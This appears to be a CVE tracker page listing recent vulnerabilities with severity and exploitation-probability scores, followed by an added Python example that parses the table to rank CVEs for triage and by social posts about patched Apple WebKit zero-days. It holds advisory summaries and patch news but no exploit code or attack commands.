Updated at UTC 2024-11-21T02:44:39.830893
CVE | CVSS | EPSS | Posts | Repos | Nuclei | Updated | Description |
---|---|---|---|---|---|---|---|
CVE-2024-44308 | 8.8 | 0.04% | 29 | 1 | | 2024-11-20T18:33:20 | The issue was addressed with improved checks. This issue is fixed in Safari 18.1 |
CVE-2024-44625 | 8.8 | 4.35% | 1 | 1 | | 2024-11-20T16:44:13 | Gogs <=0.13.0 is vulnerable to Directory Traversal via the editFilePost function |
CVE-2024-10924 | 9.8 | 0.04% | 3 | 1 | | 2024-11-20T15:30:50 | The Really Simple Security (Free, Pro, and Pro Multisite) plugins for WordPress |
CVE-2024-44309 | None | 0.04% | 27 | 0 | | 2024-11-20T00:32:20 | A cookie management issue was addressed with improved state management. This iss |
CVE-2024-11395 | 8.8 | 0.04% | 5 | 1 | | 2024-11-20T00:32:14 | Type Confusion in V8 in Google Chrome prior to 131.0.6778.85 allowed a remote at |
CVE-2024-0793 | 7.7 | 0.12% | 4 | 0 | | 2024-11-19T20:25:31 | A flaw was found in kube-controller-manager. This issue occurs when the initial |
CVE-2024-43498 | 9.8 | 0.14% | 1 | 0 | | 2024-11-19T20:01:04.877000 | .NET and Visual Studio Remote Code Execution Vulnerability |
CVE-2024-21287 | 7.5 | 0.09% | 7 | 1 | | 2024-11-19T18:31:00 | Vulnerability in the Oracle Agile PLM Framework product of Oracle Supply Chain ( |
CVE-2024-52867 | 8.2 | 0.04% | 4 | 0 | | 2024-11-19T18:30:58 | guix-daemon in GNU Guix before 5ab3c4c allows privilege escalation because build |
CVE-2024-0012 | 9.8 | 96.61% | 57 | 1 | template | 2024-11-19T17:17:29.723000 | An authentication bypass in Palo Alto Networks PAN-OS software enables an unauth |
CVE-2024-9474 | 7.2 | 97.40% | 51 | 1 | template | 2024-11-19T17:16:40.513000 | A privilege escalation vulnerability in Palo Alto Networks PAN-OS software allow |
CVE-2024-11159 | 4.3 | 0.05% | 1 | 1 | | 2024-11-19T15:32:55 | Using remote content in OpenPGP encrypted messages can lead to the disclosure of |
CVE-2024-43602 | 9.9 | 0.05% | 1 | 0 | | 2024-11-19T03:40:15.550000 | Azure CycleCloud Remote Code Execution Vulnerability |
CVE-2024-48510 | 9.8 | 0.06% | 3 | 1 | | 2024-11-18T23:41:15 | Directory Traversal vulnerability in DotNetZip v.1.16.0 and before allows a remo |
CVE-2024-43639 | 9.8 | 0.14% | 3 | 0 | | 2024-11-18T22:20:32.157000 | Windows KDC Proxy Remote Code Execution Vulnerability |
CVE-2023-1419 | 5.9 | 0.09% | 4 | 0 | | 2024-11-18T20:08:45 | A script injection vulnerability was found in the Debezium database connector, w |
CVE-2023-4639 | 7.4 | 0.10% | 4 | 0 | | 2024-11-18T20:08:31 | A flaw was found in Undertow, which incorrectly parses cookies with certain valu |
CVE-2023-6110 | 5.5 | 0.08% | 4 | 0 | | 2024-11-18T20:08:26 | A flaw was found in OpenStack. When a user tries to delete a non-existing access |
CVE-2024-52940 | 7.5 | 0.04% | 1 | 1 | | 2024-11-18T18:32:00 | AnyDesk through 8.1.0 on Windows, when Allow Direct Connections is enabled, inad |
CVE-2023-0657 | 3.4 | 0.04% | 4 | 0 | | 2024-11-18T17:28:40 | Keycloak was found to not properly enforce token types when validating signature |
CVE-2023-43091 | 9.8 | 0.04% | 4 | 1 | | 2024-11-17T15:30:52 | A flaw was found in GNOME Maps, which is vulnerable to a code injection attack v |
CVE-2020-25720 | 7.5 | 0.05% | 4 | 0 | | 2024-11-17T12:30:36 | A vulnerability was found in Samba where a delegated administrator with permissi |
CVE-2024-49060 | 8.8 | 0.04% | 2 | 1 | | 2024-11-15T21:30:53 | Azure Stack HCI Elevation of Privilege Vulnerability |
CVE-2024-50986 | None | 0.04% | 1 | 1 | | 2024-11-15T15:31:04 | An issue in Clementine v.1.3.1 allows a local attacker to execute arbitrary code |
CVE-2024-9465 | 9.1 | 94.95% | 10 | 1 | template | 2024-11-15T14:39:34.863000 | An SQL injection vulnerability in Palo Alto Networks Expedition allows an unauth |
CVE-2024-9463 | 7.5 | 96.23% | 9 | 1 | template | 2024-11-15T02:00:01.687000 | An OS command injection vulnerability in Palo Alto Networks Expedition allows an |
CVE-2024-52551 | 8.0 | 0.04% | 1 | 0 | | 2024-11-14T22:45:14 | Jenkins Pipeline: Declarative Plugin 2.2214.vb_b_34b_2ea_9b_83 and earlier does |
CVE-2024-52552 | 8.0 | 0.04% | 1 | 0 | | 2024-11-14T22:45:13 | Jenkins Authorize Project Plugin 1.7.2 and earlier evaluates a string containing |
CVE-2024-49025 | 5.4 | 0.05% | 1 | 1 | | 2024-11-14T21:32:11 | Microsoft Edge (Chromium-based) Information Disclosure Vulnerability |
CVE-2024-8068 | None | 0.04% | 3 | 1 | | 2024-11-14T18:30:34 | Privilege escalation to NetworkService Account access in Citrix Session Recordin |
CVE-2024-50252 | 5.5 | 0.04% | 1 | 0 | | 2024-11-14T18:30:33 | In the Linux kernel, the following vulnerability has been resolved: mlxsw: spec |
CVE-2024-52554 | 8.8 | 0.04% | 1 | 0 | | 2024-11-14T15:42:42 | Jenkins Shared Library Version Override Plugin 17.v786074c9fce7 and earlier decl |
CVE-2024-52550 | 8.0 | 0.04% | 1 | 0 | | 2024-11-14T15:41:49 | Jenkins Pipeline: Groovy Plugin 3990.vd281dd77a_388 and earlier, except 3975.397 |
CVE-2024-52553 | 8.8 | 0.04% | 1 | 0 | | 2024-11-14T15:37:53 | Jenkins OpenId Connect Authentication Plugin 4.418.vccc7061f5b_6d and earlier do |
CVE-2024-52549 | 4.3 | 0.04% | 1 | 0 | | 2024-11-14T15:35:55 | Jenkins Script Security Plugin 1367.vdf2fc45f229c and earlier, except 1365.1367. |
CVE-2024-10979 | 8.8 | 0.04% | 2 | 1 | | 2024-11-14T15:32:22 | Incorrect control of environment variables in PostgreSQL PL/Perl allows an unpri |
CVE-2024-7404 | 6.8 | 0.04% | 1 | 1 | | 2024-11-14T15:32:22 | An issue was discovered in GitLab CE/EE affecting all versions starting from 17. |
CVE-2024-8648 | 6.1 | 0.04% | 1 | 0 | | 2024-11-14T15:32:16 | An issue has been discovered in GitLab CE/EE affecting all versions from 16 befo |
CVE-2024-5917 | None | 0.04% | 1 | 0 | | 2024-11-14T12:31:09 | A server-side request forgery in PAN-OS software enables an unauthenticated atta |
CVE-2024-2552 | None | 0.04% | 1 | 0 | | 2024-11-14T12:31:08 | A command injection vulnerability in Palo Alto Networks PAN-OS software enables |
CVE-2024-9472 | None | 0.04% | 1 | 0 | | 2024-11-14T12:31:08 | A null pointer dereference in Palo Alto Networks PAN-OS software on PA-800 Serie |
CVE-2024-5918 | None | 0.04% | 1 | 0 | | 2024-11-14T12:31:02 | An improper certificate validation vulnerability in Palo Alto Networks PAN-OS so |
CVE-2024-5919 | None | 0.04% | 1 | 0 | | 2024-11-14T12:31:02 | A blind XML External Entities (XXE) injection vulnerability in the Palo Alto Net |
CVE-2024-5920 | None | 0.04% | 1 | 0 | | 2024-11-14T12:31:02 | A cross-site scripting (XSS) vulnerability in Palo Alto Networks PAN-OS software |
CVE-2024-8180 | 5.4 | 0.04% | 1 | 1 | | 2024-11-14T12:31:02 | An issue has been discovered in GitLab CE/EE affecting all versions from 17.3 be |
CVE-2024-9693 | 8.6 | 0.04% | 1 | 0 | | 2024-11-14T12:31:02 | An issue was discovered in GitLab CE/EE affecting all versions starting from 16. |
CVE-2024-2551 | None | 0.04% | 1 | 0 | | 2024-11-14T12:31:01 | A null pointer dereference vulnerability in Palo Alto Networks PAN-OS software e |
CVE-2024-2550 | None | 0.04% | 1 | 1 | | 2024-11-14T12:31:01 | A null pointer dereference vulnerability in the GlobalProtect gateway in Palo Al |
CVE-2024-8535 | 8.8 | 0.04% | 1 | 0 | | 2024-11-14T00:31:11 | Authenticated user can access unintended user capabilities in NetScaler ADC and |
CVE-2024-43093 | 7.8 | 0.25% | 1 | 2 | | 2024-11-13T21:31:39 | In shouldHideDocument of ExternalStorageProvider.java, there is a possible bypas |
CVE-2024-8534 | 5.3 | 0.04% | 1 | 0 | | 2024-11-13T20:35:12.293000 | Memory safety vulnerability leading to memory corruption and Denial of Service i |
CVE-2024-11116 | 4.3 | 0.04% | 1 | 1 | | 2024-11-13T18:33:06 | Inappropriate implementation in Blink in Google Chrome prior to 131.0.6778.69 al |
CVE-2024-11110 | 6.5 | 0.04% | 2 | 1 | | 2024-11-13T18:33:05 | Inappropriate implementation in Extensions in Google Chrome prior to 131.0.6778. |
CVE-2024-11111 | 4.3 | 0.04% | 1 | 1 | | 2024-11-13T18:33:05 | Inappropriate implementation in Autofill in Google Chrome prior to 131.0.6778.69 |
CVE-2024-11115 | 8.8 | 0.04% | 1 | 1 | | 2024-11-13T18:33:05 | Insufficient policy enforcement in Navigation in Google Chrome on iOS prior to 1 |
CVE-2024-11117 | 4.3 | 0.04% | 2 | 1 | | 2024-11-13T18:31:59 | Inappropriate implementation in FileSystem in Google Chrome prior to 131.0.6778. |
CVE-2024-8069 | 8.8 | 0.04% | 3 | 1 | | 2024-11-13T18:31:59 | Limited remote code execution with privilege of a NetworkService Account access |
CVE-2014-2120 | 5.4 | 0.25% | 2 | 1 | | 2024-11-13T18:31:52 | Cross-site scripting (XSS) vulnerability in the WebVPN login page in Cisco Adapt |
CVE-2021-26086 | 5.3 | 97.11% | 2 | 1 | template | 2024-11-13T17:39:36.637000 | Affected versions of Atlassian Jira Server and Data Center allow remote attacker |
CVE-2024-47574 | 7.8 | 0.04% | 2 | 1 | | 2024-11-13T12:32:16 | A authentication bypass using an alternate path or channel in Fortinet FortiClie |
CVE-2024-11113 | 8.8 | 0.04% | 1 | 1 | | 2024-11-13T00:30:48 | Use after free in Accessibility in Google Chrome prior to 131.0.6778.69 allowed |
CVE-2024-11112 | 7.5 | 0.04% | 1 | 1 | | 2024-11-13T00:30:48 | Use after free in Media in Google Chrome on Windows prior to 131.0.6778.69 allow |
CVE-2024-11114 | 8.4 | 0.04% | 1 | 1 | | 2024-11-13T00:30:48 | Inappropriate implementation in Views in Google Chrome on Windows prior to 131.0 |
CVE-2023-50176 | 7.5 | 0.04% | 1 | 0 | | 2024-11-12T21:31:01 | A session fixation in Fortinet FortiOS version 7.4.0 through 7.4.3 and 7.2.0 thr |
CVE-2024-26011 | 5.3 | 0.04% | 1 | 0 | | 2024-11-12T21:31:01 | A missing authentication for critical function in Fortinet FortiManager version |
CVE-2024-40592 | 7.6 | 0.04% | 1 | 0 | | 2024-11-12T21:31:01 | An improper verification of cryptographic signature vulnerability [CWE-347] in F |
CVE-2024-33505 | 5.6 | 0.04% | 1 | 0 | | 2024-11-12T21:31:01 | A heap-based buffer overflow in Fortinet FortiAnalyzer version 7.4.0 through 7.4 |
CVE-2024-36513 | 8.3 | 0.04% | 1 | 0 | | 2024-11-12T21:31:01 | A privilege context switching error vulnerability [CWE-270] in FortiClient Windo |
CVE-2023-47543 | 5.4 | 0.04% | 1 | 0 | | 2024-11-12T21:31:01 | An authorization bypass through user-controlled key vulnerability [CWE-639] in F |
CVE-2024-32117 | 4.9 | 0.04% | 1 | 1 | | 2024-11-12T21:31:01 | An improper limitation of a pathname to a restricted directory ('Path Traversal' |
CVE-2024-23666 | 7.5 | 0.04% | 1 | 1 | | 2024-11-12T21:30:54 | A client-side enforcement of server-side security in Fortinet FortiAnalyzer-BigD |
CVE-2024-36507 | 7.3 | 0.05% | 1 | 0 | | 2024-11-12T21:30:53 | A untrusted search path in Fortinet FortiClientWindows versions 7.4.0, versions |
CVE-2024-31496 | 6.7 | 0.04% | 1 | 1 | | 2024-11-12T21:30:52 | A stack-based buffer overflow vulnerability [CWE-121] in Fortinet FortiManager v |
CVE-2024-33510 | 4.3 | 0.04% | 1 | 1 | | 2024-11-12T21:30:52 | An improper neutralization of special elements in output used by a downstream co |
CVE-2024-36509 | 4.2 | 0.04% | 1 | 0 | | 2024-11-12T21:30:52 | An exposure of sensitive system information to an unauthorized control sphere vu |
CVE-2023-44255 | 4.1 | 0.04% | 1 | 0 | | 2024-11-12T21:30:52 | An exposure of sensitive information to an unauthorized actor [CWE-200] in Forti |
CVE-2024-32116 | 5.1 | 0.04% | 1 | 0 | | 2024-11-12T21:30:52 | Multiple relative path traversal vulnerabilities [CWE-23] in Fortinet FortiManag |
CVE-2024-35274 | 2.3 | 0.04% | 1 | 0 | | 2024-11-12T21:30:52 | An improper limitation of a pathname to a restricted directory ('Path Traversal' |
CVE-2024-32118 | 6.7 | 0.04% | 1 | 0 | | 2024-11-12T21:30:52 | Multiple improper neutralization of special elements used in an OS command ('OS |
CVE-2024-49019 | 7.8 | 0.05% | 3 | 0 | | 2024-11-12T18:31:06 | Active Directory Certificate Services Elevation of Privilege Vulnerability |
CVE-2024-43451 | 6.5 | 0.47% | 10 | 1 | | 2024-11-12T18:31:05 | NTLM Hash Disclosure Spoofing Vulnerability |
CVE-2024-49039 | 8.8 | 1.23% | 7 | 1 | | 2024-11-12T18:31:00 | Windows Task Scheduler Elevation of Privilege Vulnerability |
CVE-2024-49040 | 7.5 | 0.09% | 3 | 1 | | 2024-11-12T18:31:00 | Microsoft Exchange Server Spoofing Vulnerability |
CVE-2024-43450 | 7.5 | 0.13% | 1 | 0 | | 2024-11-12T18:30:58 | Windows DNS Spoofing Vulnerability |
CVE-2024-51567 | 10.0 | 40.13% | 1 | 2 | | 2024-11-08T21:34:54 | upgrademysqlstatus in databases/views.py in CyberPanel (aka Cyber Panel) before |
CVE-2024-5910 | 9.8 | 97.10% | 7 | 2 | template | 2024-11-08T21:33:52 | Missing authentication for a critical function in Palo Alto Networks Expedition |
CVE-2020-11921 | 8.8 | 0.04% | 1 | 0 | | 2024-11-08T18:31:57 | An issue was discovered in Lush 2 through 2020-02-25. Due to the lack of Bluetoo |
CVE-2024-51998 | 8.6 | 0.04% | 1 | 0 | | 2024-11-08T13:55:32 | ### Summary The validation for the file URI scheme falls short, and results in |
CVE-2024-51987 | 5.4 | 0.04% | 1 | 0 | | 2024-11-08T13:55:27 | ### Impact HTTP Clients created by `AddUserAccessTokenHttpClient` may use a diff |
CVE-2024-47072 | 7.5 | 0.04% | 1 | 0 | | 2024-11-08T13:55:23 | ### Impact The vulnerability may allow a remote attacker to terminate the applic |
CVE-2024-40715 | 7.7 | 0.07% | 1 | 0 | | 2024-11-07T18:31:30 | A vulnerability in Veeam Backup & Replication Enterprise Manager has been identi |
CVE-2024-50340 | 7.3 | 0.05% | 1 | 1 | | 2024-11-06T23:39:52 | ### Description When the `register_argc_argv` php directive is set to `on` , an |
CVE-2024-20536 | 8.8 | 0.04% | 1 | 1 | | 2024-11-06T18:31:17 | A vulnerability in a REST API endpoint and web-based management interface of Cis |
CVE-2024-20484 | 7.5 | 0.04% | 1 | 1 | | 2024-11-06T18:31:17 | A vulnerability in the External Agent Assignment Service (EAAS) feature of Cisco |
CVE-2024-10827 | 8.8 | 0.04% | 1 | 0 | | 2024-11-06T18:31:17 | Use after free in Serial in Google Chrome prior to 130.0.6723.116 allowed a remo |
CVE-2024-10826 | 8.8 | 0.04% | 1 | 0 | | 2024-11-06T18:31:17 | Use after free in Family Experiences in Google Chrome on Android prior to 130.0. |
CVE-2024-20418 | 10.0 | 0.04% | 1 | 0 | | 2024-11-06T18:31:11 | A vulnerability in the web-based management interface of Cisco Unified Industria |
CVE-2024-42509 | 9.8 | 0.04% | 3 | 0 | | 2024-11-06T18:31:09 | Command injection vulnerability in the underlying CLI service could lead to unau |
CVE-2024-47460 | 9.1 | 0.04% | 1 | 0 | | 2024-11-06T18:31:09 | Command injection vulnerability in the underlying CLI service could lead to unau |
CVE-2024-10914 | 8.1 | 16.93% | 6 | 1 | template | 2024-11-06T15:30:46 | A vulnerability was found in D-Link DNS-320, DNS-320LW, DNS-325 and DNS-340L up |
CVE-2024-49767 | 7.5 | 0.06% | 1 | 0 | | 2024-11-05T21:35:24 | Applications using Werkzeug to parse `multipart/form-data` requests are vulnerab |
CVE-2024-8934 | 6.5 | 0.04% | 1 | 0 | | 2024-10-31T15:31:04 | A local user with administrative access rights can enter specialy crafted values |
CVE-2024-44252 | 7.1 | 0.04% | 1 | 0 | | 2024-10-30T18:30:48 | A logic issue was addressed with improved file handling. This issue is fixed in |
CVE-2024-38821 | 9.1 | 0.04% | 1 | 1 | | 2024-10-28T17:59:30 | Spring WebFlux applications that have Spring Security authorization rules on sta |
CVE-2024-49766 | None | 0.04% | 1 | 0 | | 2024-10-26T03:47:04 | On Python < 3.11 on Windows, `os.path.isabs()` does not catch UNC paths like `// |
CVE-2024-47575 | 9.8 | 5.18% | 7 | 1 | | 2024-10-23T15:31:52 | A missing authentication for critical function in FortiManager 7.6.0, FortiManag |
CVE-2024-21216 | 9.8 | 0.15% | 2 | 0 | | 2024-10-17T15:31:09 | Vulnerability in the Oracle WebLogic Server product of Oracle Fusion Middleware |
CVE-2024-4131 | 7.8 | 0.04% | 1 | 1 | | 2024-10-11T18:32:57 | A DLL hijack vulnerability was reported in Lenovo Emulator that could allow a lo |
CVE-2024-43601 | 7.1 | 0.05% | 1 | 0 | | 2024-10-08T18:33:29 | Visual Studio Code for Linux Remote Code Execution Vulnerability |
CVE-2024-38813 | 7.5 | 0.09% | 19 | 1 | | 2024-10-02T15:31:39 | The vCenter Server contains a privilege escalation vulnerability. A malicious ac |
CVE-2024-38812 | 9.8 | 0.09% | 19 | 1 | | 2024-10-02T14:16:47.610000 | The vCenter Server contains a heap-overflow vulnerability in the implementation |
CVE-2022-46751 | 8.2 | 0.15% | 1 | 0 | | 2024-09-30T13:35:28 | Improper Restriction of XML External Entity Reference, XML Injection (aka Blind |
CVE-2024-47062 | 8.8 | 0.05% | 1 | 1 | template | 2024-09-20T22:07:52 | # Security Advisory: Multiple Vulnerabilities in Navidrome ## Summary Navidrom |
CVE-2024-45409 | 10.0 | 16.41% | 1 | 1 | template | 2024-09-16T15:29:27 | Ruby-SAML in <= 12.2 and 1.13.0 <= 1.16.0 does not properly verify the signature |
CVE-2024-40711 | 9.8 | 96.69% | 1 | 2 | template | 2024-09-09T18:30:30 | A deserialization of untrusted data vulnerability with a malicious payload can a |
CVE-2024-42057 | 8.1 | 0.09% | 2 | 1 | | 2024-09-03T03:30:40 | A command injection vulnerability in the IPSec VPN feature of Zyxel ATP series f |
CVE-2024-39717 | 6.6 | 0.21% | 2 | 1 | | 2024-08-27T18:31:36 | The Versa Director GUI provides an option to customize the look and feel of the |
CVE-2024-5034 | 8.8 | 0.04% | 1 | 1 | | 2024-08-01T15:33:03 | The SULly WordPress plugin before 4.3.1 does not have CSRF checks in some places |
CVE-2017-0199 | 7.8 | 97.50% | 1 | 26 | | 2024-07-24T18:32:16 | Microsoft Office 2007 SP3, Microsoft Office 2010 SP2, Microsoft Office 2013 SP1, |
CVE-2024-4577 | 9.8 | 96.32% | 1 | 1 | template | 2024-06-21T21:35:02 | In PHP versions 8.1.* before 8.1.29, 8.2.* before 8.2.20, 8.3.* before 8.3.8, wh |
CVE-2024-35250 | 7.8 | 0.04% | 2 | 2 | | 2024-06-20T18:35:10 | Windows Kernel-Mode Driver Elevation of Privilege Vulnerability |
CVE-2024-30103 | 8.8 | 0.09% | 1 | 0 | | 2024-06-11T18:30:56 | Microsoft Outlook Remote Code Execution Vulnerability |
CVE-2024-30051 | 7.8 | 0.08% | 1 | 1 | | 2024-05-16T21:31:58 | Windows DWM Core Library Elevation of Privilege Vulnerability |
CVE-2024-4351 | 8.8 | 0.05% | 1 | 1 | | 2024-05-16T12:30:29 | The Tutor LMS Pro plugin for WordPress is vulnerable to unauthorized access of d |
CVE-2024-3400 | 9.8 | 96.41% | 1 | 1 | template | 2024-04-29T05:02:31 | A command injection vulnerability in the GlobalProtect feature of Palo Alto Netw |
CVE-2023-27944 | 8.6 | 0.06% | 1 | 0 | | 2024-04-11T21:19:47 | This issue was addressed with a new entitlement. This issue is fixed in macOS Ve |
CVE-2024-26229 | 7.8 | 0.04% | 2 | 1 | | 2024-04-09T18:30:35 | Windows CSC Service Elevation of Privilege Vulnerability |
CVE-2023-3519 | 9.8 | 96.55% | 1 | 15 | | 2024-04-04T06:17:12 | Unauthenticated remote code execution |
CVE-2023-32414 | 8.6 | 0.05% | 1 | 0 | | 2024-04-04T05:08:19 | The issue was addressed with improved checks. This issue is fixed in macOS Ventu |
CVE-2023-27997 | 9.8 | 9.72% | 2 | 1 | | 2024-04-04T04:45:33 | A heap-based buffer overflow vulnerability [CWE-122] in FortiOS version 7.2.4 an |
CVE-2024-20767 | 8.2 | 11.07% | 2 | 4 | template | 2024-03-18T12:31:54 | ColdFusion versions 2023.6, 2021.12 and earlier are affected by an Improper Acce |
CVE-2023-36328 | 9.8 | 0.16% | 1 | 1 | | 2024-03-07T18:30:26 | Integer Overflow vulnerability in mp_grow in libtom libtommath before commit beb |
CVE-2023-4911 | 7.8 | 17.23% | 1 | 1 | | 2024-03-02T05:06:50 | A buffer overflow was discovered in the GNU C Library's dynamic loader ld.so whi |
CVE-2024-1212 | 10.0 | 91.88% | 4 | 2 | | 2024-02-21T18:31:06 | Unauthenticated remote attackers can access the system through the LoadMaster ma |
CVE-2024-23113 | 9.8 | 1.84% | 5 | 1 | | 2024-02-15T15:30:37 | A use of externally-controlled format string in Fortinet FortiOS versions 7.4.0 |
CVE-2023-20198 | 10.0 | 88.58% | 2 | 1 | template | 2024-02-03T05:07:29 | Cisco is aware of active exploitation of a previously unknown vulnerability in t |
CVE-2023-20273 | 7.2 | 7.47% | 2 | 1 | | 2024-02-03T05:06:23 | A vulnerability in the web UI feature of Cisco IOS XE Software could allow an au |
CVE-2020-3259 | 7.5 | 2.71% | 1 | 0 | | 2023-08-16T18:30:19 | A vulnerability in the web services interface of Cisco Adaptive Security Applian |
CVE-2021-40539 | 9.8 | 97.47% | 4 | 1 | template | 2023-08-08T15:31:21 | Zoho ManageEngine ADSelfService Plus version 6113 and prior is vulnerable to RES |
CVE-2021-4043 | 5.5 | 0.09% | 1 | 9 | | 2023-06-05T05:00:42 | NULL Pointer Dereference in GitHub repository gpac/gpac prior to 1.1.0. |
CVE-2019-16278 | 9.8 | 97.42% | 1 | 15 | template | 2023-03-23T18:30:31 | Directory Traversal in the function http_verify in nostromo nhttpd through 1.9.6 |
CVE-2022-42475 | 9.8 | 27.42% | 2 | 1 | | 2023-02-02T05:01:14 | A heap-based buffer overflow vulnerability [CWE-122] in FortiOS SSL-VPN 7.2.0 th |
CVE-2021-27860 | 8.8 | 28.52% | 4 | 1 | | 2023-02-01T05:06:42 | A vulnerability in the web management interface of FatPipe WARP, IPVPN, and MPVP |
CVE-2019-12900 | 9.8 | 1.96% | 1 | 0 | | 2023-01-27T05:02:50 | BZ2_decompress in decompress.c in bzip2 through 1.0.6 has an out-of-bounds write |
CVE-2020-12271 | 9.8 | 1.67% | 1 | 0 | | 2023-01-27T05:02:29 | A SQL injection issue was found in SFOS 17.0, 17.1, 17.5, and 18.0 before 2020-0 |
CVE-2024-10224 | 0 | 0.05% | 2 | 1 | | N/A | |
CVE-2024-11394 | 0 | 0.00% | 1 | 0 | | N/A | |
CVE-2024-11393 | 0 | 0.00% | 1 | 0 | | N/A | |
CVE-2024-31449 | 0 | 0.04% | 1 | 1 | | N/A | |
CVE-2024-40590 | 0 | 0.00% | 1 | 1 | | N/A | |
CVE-2024-10240 | 0 | 0.00% | 1 | 0 | | N/A | |
CVE-2021-41277 | 0 | 97.29% | 2 | 1 | template | N/A | |
CVE-2024-45819 | 0 | 0.00% | 1 | 0 | | N/A | |
CVE-2024-27864 | 0 | 0.00% | 1 | 0 | | N/A | |
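Added example, not code from the page or from the tracker that produced it: a parser for the table above that ranks rows for triage. The six sample rows are copied from the table (one of them written with an explicit empty Nuclei cell to show the column-aligned form); the ranking rules, including the 10% EPSS threshold, are assumptions of this example. Because the extracted rows do not always carry a Nuclei cell, so the remaining columns can shift left, the parser locates the Updated timestamp by its shape rather than by column index.

```python
"""Parse the CVE tracker table and rank its rows for triage.

Added example, not the tracker's own code. SAMPLE_TABLE rows are copied
from the table above; the ranking heuristic is an assumption.
"""
import re
from dataclasses import dataclass
from typing import List, Optional

# Constructed sample: rows copied from the table above in the page's own
# pipe-separated layout. Some rows omit the Nuclei cell entirely (so the
# timestamp shifts one column left and an empty cell trails the row), and
# CVE-2024-44309 is written with an explicit empty Nuclei cell instead.
SAMPLE_TABLE = """\
CVE-2024-43602 | 9.9 | 0.05% | 1 | 0 | 2024-11-19T03:40:15.550000 | Azure CycleCloud Remote Code Execution Vulnerability | |
CVE-2024-9474 | 7.2 | 97.40% | 51 | 1 | template | 2024-11-19T17:16:40.513000 | A privilege escalation vulnerability in Palo Alto Networks PAN-OS software allow |
CVE-2024-0012 | 9.8 | 96.61% | 57 | 1 | template | 2024-11-19T17:17:29.723000 | An authentication bypass in Palo Alto Networks PAN-OS software enables an unauth |
CVE-2024-44309 | None | 0.04% | 27 | 0 | | 2024-11-20T00:32:20 | A cookie management issue was addressed with improved state management. This iss |
CVE-2024-51567 | 10.0 | 40.13% | 1 | 2 | 2024-11-08T21:34:54 | upgrademysqlstatus in databases/views.py in CyberPanel (aka Cyber Panel) before | |
CVE-2021-41277 | 0 | 97.29% | 2 | 1 | template | N/A | |
"""

ISO_TS = re.compile(r"^\d{4}-\d{2}-\d{2}T\d{2}:\d{2}:\d{2}")


@dataclass
class Row:
    cve: str
    cvss: Optional[float]   # None where the page shows "None" or 0 (not yet scored)
    epss: float             # exploitation probability as a fraction, 0.0..1.0
    posts: int
    repos: int
    nuclei: bool            # a Nuclei template exists for this CVE
    updated: Optional[str]  # None where the page shows N/A
    description: str


def parse_row(line: str) -> Row:
    cells = [c.strip() for c in line.strip().strip("|").split("|")]
    cve, cvss_s, epss_s, posts_s, repos_s = cells[:5]
    rest = cells[5:]
    # The Nuclei cell may be absent rather than empty: detect it by value.
    nuclei = bool(rest) and rest[0] == "template"
    if nuclei:
        rest = rest[1:]
    # Find the timestamp by shape, not by position; every other non-empty
    # cell after the counts is description text.
    updated: Optional[str] = None
    seen_ts = False
    desc_parts: List[str] = []
    for cell in rest:
        if not seen_ts and (ISO_TS.match(cell) or cell == "N/A"):
            seen_ts = True
            updated = None if cell == "N/A" else cell
        elif cell:
            desc_parts.append(cell)
    return Row(
        cve=cve,
        cvss=None if cvss_s in ("None", "0") else float(cvss_s),
        epss=float(epss_s.rstrip("%")) / 100.0,
        posts=int(posts_s),
        repos=int(repos_s),
        nuclei=nuclei,
        updated=updated,
        description=" ".join(desc_parts),
    )


def parse_table(text: str) -> List[Row]:
    rows: List[Row] = []
    for line in text.splitlines():
        # Skip blank lines and the markdown header / separator rows.
        if not line.strip() or line.startswith("CVE |") or line.startswith("---"):
            continue
        rows.append(parse_row(line))
    return rows


def rank_by_cvss(rows: List[Row]) -> List[str]:
    """Naive ordering by severity alone; unscored rows sink to the bottom."""
    return [r.cve for r in sorted(rows, key=lambda r: r.cvss or 0.0, reverse=True)]


def rank_by_epss(rows: List[Row]) -> List[str]:
    """Assumed triage order: exploitation probability first, then whether a
    Nuclei template lets you verify exposure, then CVSS as a tiebreaker."""
    return [r.cve for r in sorted(rows, key=lambda r: (r.epss, r.nuclei, r.cvss or 0.0), reverse=True)]


def actionable(rows: List[Row], epss_threshold: float = 0.10) -> List[str]:
    """CVEs worth a same-day look: high EPSS or already scannable with Nuclei.
    The 10% threshold is an assumption of this example."""
    return [r.cve for r in rows if r.epss >= epss_threshold or r.nuclei]


if __name__ == "__main__":
    parsed = parse_table(SAMPLE_TABLE)
    print("by CVSS:", rank_by_cvss(parsed))
    print("by EPSS:", rank_by_epss(parsed))
    print("actionable:", actionable(parsed))
```

Ranking by CVSS alone puts CVE-2024-51567 and CVE-2024-43602 first and CVE-2024-9474 fourth; ranking by EPSS puts CVE-2024-9474 first despite its 7.2 score, because the page's own EPSS column says it is far more likely to be exploited. CVSS and EPSS answer different questions, which is why the table carries both.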
updated 2024-11-20T18:33:20
29 posts
1 repos
iOS 18.1.1 and macOS Sequoia 15.1.1 close actively exploited security vulnerabilities
With the new updates iOS 18.1.1 and macOS Sequoia 15.1.1, Apple has closed significant security vulnerabilities which, according to repor
https://www.apfeltalk.de/magazin/feature/ios-18-1-1-und-macos-sequoia-15-1-1-schliessen-aktiv-ausgenutzte-sicherheitsluecken/
#Feature #iPad #iPhone #Mac #Apple #CrossSiteScripting #CVE202444308 #CVE202444309 #IntelMac #IOS1811 #JavaScriptCore #MacOSSequoia1511 #Sicherheitsupdate #Webkit
##Whoa. I was actually expecting iOS 18.2 from Apple. Instead they are now pushing out 18.1.1 with a super important security update (CVE-2024-44308) that is supposed to fix a zero-day in WebKit discovered by Google.
##Apple Confirms Zero-Day Attacks Hitting Intel-based Macs https://www.securityweek.com/apple-confirms-zero-day-attacks-hitting-intel-based-macs/ #Malware&Threats #Vulnerabilities #CVE202444308 #CVE202444309 #macOSSequoia #iOS1811 #Apple
##Update now! Apple confirms vulnerabilities are already being exploited
#CVE_2024_44308 #CVE_2024_44309
https://www.malwarebytes.com/blog/news/2024/11/update-now-apple-confirms-vulnerabilities-are-being-exploited
##Apple exploited zero-days
CVE-2024-44308 JavaScriptCore: Processing maliciously crafted web content may lead to arbitrary code execution. Apple is aware of a report that this issue may have been actively exploited on Intel-based Mac systems.
CVE-2024-44309 WebKit: Processing maliciously crafted web content may lead to a cross-site scripting attack. Apple is aware of a report that this issue may have been actively exploited on Intel-based Mac systems.
Both zero-days reported by Clément Lecigne and Benoît Sevens of Google's Threat Analysis Group. h/t: @applsec cc: @campuscodi @mttaggart @cR0w @briankrebs @ntkramer @iagox86 @dreadpir8robots @catc0n
#apple #zeroday #vulnerability #eitw #activeexploitation #cve #CVE_2024_44308 #CVE_2024_44309
